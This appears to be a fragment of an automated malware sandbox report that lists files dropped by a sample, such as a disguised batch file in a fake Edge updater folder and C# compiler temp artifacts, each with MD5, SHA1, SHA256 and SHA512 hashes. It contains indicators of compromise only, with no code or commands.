SHA512 672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

MD5 718273a5fd30c297d410e340722fc6db
SHA1 cf82ae296e8b006db9fb51ced40b57db1cc4e698
SHA256 6ce02325b6861901177d845dd9d3a6de67790d53e8b3942b0d4348d650d0c3b7
SHA512 133d0d22f630541b0a56e3a3cb123516e9b9b78ddd141cb47e33d9ba8ec1aba79161be1fe2cca263b0753d6f1eb9e93581479dce0230fabf35b5f694fdbf4572

\??\c:\Users\Admin\AppData\Local\Temp\bfefs0z2\bfefs0z2.cmdline

MD5 e26515e913261f3b9ed1189606f1371e
SHA1 bb1a64d55de75515f14b24296750cb6777ac9c05
SHA256 eec480bc88ea2fcc2e3df0cf7475ca423e16a8d780c883a1ef0694db2c786690
SHA512 328dddcac965a5a978c8b2e7141ccbd693463192886e7fcb03c76431dbd23e93e91415ea22547bba6f8f1f1d2fe0b0ffaf15778f8ccb9a59504f0f37116e953c

\??\c:\Users\Admin\AppData\Local\Temp\bfefs0z2\bfefs0z2.0.cs

MD5 b462a7b0998b386a2047c941506f7c1b
SHA1 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f
SHA256 a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35
SHA512 eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

\??\c:\Users\Admin\AppData\Local\Temp\bfefs0z2\CSC6AADD02211AD453DA425363CA9C4A4B6.TMP

MD5 263525609d6154a748a4030d53cfc196
SHA1 72d4db97cd554b9252c3c6479bd3ce2a2d208d56
SHA256 c27bd4e13f51d0c1ad1e43a97cbcde7468e7654cdc28303b4dd0ec0da5369e44
SHA512 6748ba5a421ff8e291e98524a36519ec41f406f76dab19fda33c9ccd4e3210b82eb2376c5832fc827a8d9e5127062cad8213f7f58ac037e9f47ff2633ddc4900

C:\Users\Admin\AppData\Local\Temp\RES68BC.tmp

MD5 fc8911df2ebdbbe181344d9711bcb7d8
SHA1 b44d5a8c07dcbcee6263f7e3edc873e3adff1811
SHA256 7052fc620d4300592ebe159a9efd44d1208a04c70128842a09e354e7370c6461
SHA512 5a2d8270f294cb4e6837e61f95133d9f129fbc25ca6a12209ee87fc1d537aa9dd7802a28fcc5c7934c88b5fa782ca60ba01f8d385657f8a4ef5084ec24195eb9

memory/3112-193-0x0000023BCE910000-0x0000023BCE918000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bfefs0z2\bfefs0z2.dll

MD5 c8a51d8d80984376f4e379e6eeb1f709
SHA1 af61de222551e653037c8d717841570315b1f2d9
SHA256 eb250ca38f11ca7c3929ff19710cbdaf58ae60bde8ad48f85a4a8ec3e544d4a8
SHA512 085ff87aac91b603344b2296a470c6b3884fd8b17c09dae9a55899f573766b40705f8eae04748819bca2b10f60ac4263f815d2de27f0f36e20fcfca6fbb22799

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a7346e8300ffbad9a5a3ef3b99430065
SHA1 15c05fa6b11bdaa0dc2c3b3e3568642d72580673
SHA256 c8ec7ef691b4450e7c284704aa9563ac6dcd71c6a335e827e3c94c81c66d4a8e
SHA512 8d95f80aeade6b79cca1581aa076febe5f7147066887c27725107547975fe02afdec5216bbec22fee9c6aa929efa9de6271fb1ce74bc39c1674b786fdb35291c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 15dde0683cd1ca19785d7262f554ba93
SHA1 d039c577e438546d10ac64837b05da480d06bf69
SHA256 d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961
SHA512 57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672